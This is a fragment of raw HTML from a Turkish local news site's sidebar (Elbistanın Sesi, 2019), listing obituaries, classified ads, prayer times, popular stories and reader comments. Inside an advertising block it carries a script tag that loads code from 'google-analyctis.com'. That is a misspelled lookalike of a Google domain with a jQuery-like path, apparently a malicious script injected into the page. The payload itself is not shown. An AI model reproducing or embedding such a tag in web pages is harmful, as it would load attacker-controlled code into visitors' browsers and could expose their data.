Güven, 62 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/aligolu-koc-65-yasinda-h63221.html" title="Aligölü Koç 65 yaşında,"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/aligolu_koc_65_yasinda_h63221_5cb62.jpeg" alt="Aligölü Koç 65 yaşında," /> <span>Aligölü Koç 65 yaşında,</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/kebabci-hayri-arik-h63217.html" title="Kebabcı Hayri Arık"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/kebabci_hayri_arik_h63217_729e6.jpg" alt="Kebabcı Hayri Arık" /> <span>Kebabcı Hayri Arık</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/ali-osman-yucel-71-yasinda-h63216.html" title="Ali Osman Yücel 71 Yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/ali_osman_yucel_71_yasinda_h63216_8fc42.jpg" alt="Ali Osman Yücel 71 Yaşında" /> <span>Ali Osman Yücel 71 Yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/anma-h63209.html" title="ANMA"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/anma_h63209_e1d71.jpg" alt="ANMA" /> <span>ANMA</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/sebahattin-baloglu-70-yasinda-h63207.html" title="Sebahattin Baloğlu 70 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/sebahattin_baloglu_70_yasinda_h63207_9759f.jpg" alt="Sebahattin Baloğlu 70 yaşında" /> <span>Sebahattin Baloğlu 70 yaşında</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ozel-ders-10697.html" title="Özel Ders" >Özel Ders</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ozel-ders-10697.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Özel Ders" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-10696.html" title="Satılık daire" >Satılık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-10696.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satılık daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesi-proma-karsisi-arsa-10694.html" title="Şahin tepesi proma karşısı arsa" >Şahin tepesi proma karşısı arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesi-proma-karsisi-arsa-10694.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Şahin tepesi proma karşısı arsa" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesinde-yesillik-icinde-10693.html" title="Şahin tepesinde yeşillik içinde" >Şahin tepesinde yeşillik içinde</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesinde-yesillik-icinde-10693.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Şahin tepesinde yeşillik içinde" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/is-ariyorum-10692.html" title="İş ariyorum" >İş ariyorum</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/is-ariyorum-10692.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="İş ariyorum" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/acil-is-ariyorum-10691.html" title="acil iş arıyorum" >acil iş arıyorum</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/acil-is-ariyorum-10691.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="acil iş arıyorum" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sehir-merkezinde-satilik-dukkan-10690.html" title="ŞEHİR MERKEZİNDE SATILIK DÜKKAN" >ŞEHİR MERKEZİNDE SATILIK DÜKKAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sehir-merkezinde-satilik-dukkan-10690.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ŞEHİR MERKEZİNDE SATILIK DÜKKAN" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/parkede-calisacak-eleman-araniyor-10689.html" title="PARKEDE ÇALIŞACAK ELEMAN ARANIYOR" >PARKEDE ÇALIŞACAK ELEMAN ARANIYOR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/parkede-calisacak-eleman-araniyor-10689.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="PARKEDE ÇALIŞACAK ELEMAN ARANIYOR" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/elektirik-isi-yapilir-uygun-fiyata-binalarin-10688.html" title="elektirik işi yapilir uygun fiyata binalarin" >elektirik işi yapilir uygun fiyata binalarin</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/elektirik-isi-yapilir-uygun-fiyata-binalarin-10688.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="elektirik işi yapilir uygun fiyata binalarin" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-luks-daire-10685.html" title="Kiralık lüks daire" >Kiralık lüks daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-luks-daire-10685.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralık lüks daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/masrafsiz-honda-10683.html" title="masrafsiz honda" >masrafsiz honda</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/masrafsiz-honda-10683.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/70c6f48a2d75d09b2eb6511f9efb591dc6292d94.jpg" alt="masrafsiz honda" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ev-10681.html" title="Ev" >Ev</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ev-10681.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Ev" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesi-kiralik-daire-10680.html" title="ŞAHİN TEPESİ KİRALIK DAİRE." >ŞAHİN TEPESİ KİRALIK DAİRE.</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesi-kiralik-daire-10680.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ŞAHİN TEPESİ KİRALIK DAİRE." class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-tasoluk-10679.html" title="--SATILIK ARSA TAŞOLUK--" >--SATILIK ARSA TAŞOLUK--</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-tasoluk-10679.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/7e8774cd38e8b091e9a825ae63a4d9df09074d26.jpg" alt="--SATILIK ARSA TAŞOLUK--" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsalar-10678.html" title="--SATILIK ARSALAR---" >--SATILIK ARSALAR---</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsalar-10678.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/bf67077f99628df6a43368bda5eb52750cacc8ed.jpg" alt="--SATILIK ARSALAR---" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes"></a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/elbistaninsesi" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/av-tufegi-ile-dehset-sacti-1-olu-2-yarali-h63020.html" title="Av tüfeği ile dehşet saçtı: 1..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/05/av_tufegi_dehset_sacti_1_olu_2_yarali_h63020_e5b8f.JPG" alt="Av tüfeği ile dehşet saçtı: 1..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/av-tufegi-ile-dehset-sacti-1-olu-2-yarali-h63020.html" title="" ><span class="en-hit">1.</span> <strong>Av tüfeği ile dehşet saçtı: 1...</strong> <span class="en-spot en-hidden">Elbistan’da meydana gelen olayda bir kişi, otomatik av tüfeği ile...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/bicakli-kavgada-kan-akti-2-yarali-h63170.html" title="Bıçaklı kavgada kan aktı: 2 yaralı" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/bicakli_kavgada_kan_akti_2_yarali_h63170_c5636.JPG" alt="Bıçaklı kavgada kan aktı: 2 yaralı" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/bicakli-kavgada-kan-akti-2-yarali-h63170.html" title="" ><span class="en-hit">2.</span> <strong>Bıçaklı kavgada kan aktı: 2 yaralı</strong> <span class="en-spot en-hidden">Elbistan’da çarşı merkezine yaşanan kavgada bıçaklanan 18 yaşındaki...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/gazinolar-15-temmuza-kadar-kaldirilacak-h62999.html" title="Gazinolar, 15 Temmuza kadar kaldırılacak" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/05/gazinolar_15_temmuza_kadar_kaldirilacak_h62999_43e3f.jpg" alt="Gazinolar, 15 Temmuza kadar kaldırılacak" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/gazinolar-15-temmuza-kadar-kaldirilacak-h62999.html" title="" ><span class="en-hit">3.</span> <strong>Gazinolar, 15 Temmuz’a kadar kaldırılacak</strong> <span class="en-spot en-hidden">Elbistan’da bulunan gazinolar, Elbistan Belediyesi, Kahramanmaraş Valiliği...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-feci-kaza-3-olu-3u-agir-4-yarali-h63222.html" title="Elbistanda feci kaza: 3 ölü, 3ü..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_feci_kaza_3_olu_3u_agir_4_yarali_h63222_341ba.jpg" alt="Elbistanda feci kaza: 3 ölü, 3ü..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-feci-kaza-3-olu-3u-agir-4-yarali-h63222.html" title="" ><span class="en-hit">4.</span> <strong>Elbistan’da feci kaza: 3 ölü, 3’ü...</strong> <span class="en-spot en-hidden">Elbistan’da sürücüsünün direksiyon hakimiyetini kaybettiği otomobilin...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/kazim-mert-81-yasinda-h63011.html" title="Kazım Mert 81 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/05/kazim_mert_81_yasinda_h63011_94127.jpg" alt="Kazım Mert 81 yaşında," ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/kazim-mert-81-yasinda-h63011.html" title="" ><span class="en-hit">5.</span> <strong>Kazım Mert 81 yaşında,</strong> <span class="en-spot en-hidden">Kazım Mert 81 yaşında,</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/unal-elbistanin-bir-dedigi-iki-olmuyor-h63187.html" title="Ünal: Elbistanın bir dediği..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/unal_elbistanin_bir_dedigi_iki_olmuyor_h63187_492c3.JPG" alt="Ünal: Elbistanın bir dediği..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/unal-elbistanin-bir-dedigi-iki-olmuyor-h63187.html" title="" ><span class="en-hit">1.</span> <strong>Ünal: “Elbistan’ın bir dediği...</strong> <span class="en-spot en-hidden">AK Parti Genel Başkan Yardımcısı Mahir Ünal, Elbistan’ın hizmet...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/kazim-mert-81-yasinda-h63011.html" title="Kazım Mert 81 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/05/kazim_mert_81_yasinda_h63011_94127.jpg" alt="Kazım Mert 81 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/kazim-mert-81-yasinda-h63011.html" title="" ><span class="en-hit">2.</span> <strong>Kazım Mert 81 yaşında,</strong> <span class="en-spot en-hidden">Kazım Mert 81 yaşında,</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/sefika-dogan-85-yasinda-h63063.html" title="Şefika Doğan 85 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/05/sefika_dogan_85_yasinda_h63063_2588b.jpg" alt="Şefika Doğan 85 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/sefika-dogan-85-yasinda-h63063.html" title="" ><span class="en-hit">3.</span> <strong>Şefika Doğan 85 yaşında,</strong> <span class="en-spot en-hidden"> Şefika Doğan 85 yaşında,</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/dogalgazda-2019-yili-hat-doseme-calismalari-basladi-h62940.html" title="Doğalgazda 2019 yılı hat döşeme..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/05/dogalgazda_2019_yili_hat_doseme_calismalari_basladi_h62940_de11c.jpg" alt="Doğalgazda 2019 yılı hat döşeme..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/dogalgazda-2019-yili-hat-doseme-calismalari-basladi-h62940.html" title="" ><span class="en-hit">4.</span> <strong>Doğalgazda 2019 yılı hat döşeme...</strong> <span class="en-spot en-hidden">Elbistan’da doğalgaz dağıtım işini üstlenen ARMADAŞ A.Ş.’nin...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ismail-yildiz-75-yasinda-h63085.html" title="İsmail Yıldız 75 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/05/ismail_yildiz_75_yasinda_h63085_78635.jpg" alt="İsmail Yıldız 75 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ismail-yildiz-75-yasinda-h63085.html" title="" ><span class="en-hit">5.</span> <strong>İsmail Yıldız 75 yaşında,</strong> <span class="en-spot en-hidden">İsmail Yıldız 75 yaşında,</span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-feci-kaza-3-olu-3u-agir-4-yarali-h63222.html#comment_256706" title="" >Allah rahmet eylesin mekanları cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/unal-elbistanin-bir-dedigi-iki-olmuyor-h63187.html#comment_256705" title="" >Devrim bence sen sus elbistana hizmet akıyor...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/amerikali-muhendis-geline-elbistan-usulu-kina-toreni-h63224.html#comment_256704" title="" >SAYIN VATANDAŞ, SEN NEWYORK U İYİ BİLİN....</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-feci-kaza-3-olu-3u-agir-4-yarali-h63222.html#comment_256703" title="" >Allah rahmet eylesin</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/amerikali-muhendis-geline-elbistan-usulu-kina-toreni-h63224.html#comment_256702" title="" >Gelinimiz aslen nereli olduğunu yazmamissin...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aligolu-koc-65-yasinda-h63221.html#comment_256701" title="" >Sevgilı dost iyi insan vefatına çok üzüldüm...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/bilal-guven-62-yasinda-h63226.html#comment_256700" title="" >MERHUMA ALLAH&#39;TAN RAHMET, YAKINLARINA...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/unal-elbistanin-bir-dedigi-iki-olmuyor-h63187.html#comment_256699" title="" >MAHIR beyin söylediğine sahsim olarak...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/amerikali-muhendis-geline-elbistan-usulu-kina-toreni-h63224.html#comment_256698" title="" >Çok güzel</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistana-veteriner-fakultesi-aciliyor-h63211.html#comment_256697" title="" >Sayın oda Başkanı ile görüştüm yanlış...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sebahattin-baloglu-70-yasinda-h63207.html#comment_256694" title="" >Allahımrahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/kebabci-hayri-arik-h63217.html#comment_256693" title="" >Allahımrahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/abdurrahim-karakoc-mezari-basinda-anildi-h63225.html#comment_256691" title="" >Mekani cennet olsun..</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/15-yasindaki-bebegin-kesin-olum-sebebi-otopside-belli-olacak-h63223.html#comment_256690" title="" >Allah rahmet eylesin bizimde böyle bir...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/kebabci-hayri-arik-h63217.html#comment_256689" title="" >Allah Rahmet Eylesin mekanı cebnet olsun.</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistana-veteriner-fakultesi-aciliyor-h63211.html#comment_256688" title="" >Ziraat Mühendisleri ile ilgili zevat vs....</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistana-veteriner-fakultesi-aciliyor-h63211.html#comment_256687" title="" >Sait bey, Veterinerlik fakültesini ZMO...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-feci-kaza-3-olu-3u-agir-4-yarali-h63222.html#comment_256686" title="" >Allah rahmet eylesin Allah yaralılara şifa...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistana-veteriner-fakultesi-aciliyor-h63211.html#comment_256685" title="" >yorumlara bakıyorum da, haberi okuyan yok...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-feci-kaza-3-olu-3u-agir-4-yarali-h63222.html#comment_256683" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" selected>09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" selected>Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2019" selected>2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> <option value="2015" >2015</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:160px;height:599px;"> <p style="width:160px;"><a href="http://www.elbistaninsesi.com/banner.php?id=129" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/temurlar_iY_merkezi.jpg&w=160&h=599&q=90" width="160" height="599" style="width:160px;height: 599px;border:0" alt="banner129" /></a></p> <p><a href="http://www.elbistaninsesi.com/banner.php?id=119" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/YMAMI_AZAM_CAMY_YARDIM.jpg&w=160&h=426&q=90" width="160" height="426" style="width:160px;height: 426px;border:0" alt="banner119" /></a></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2019 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a 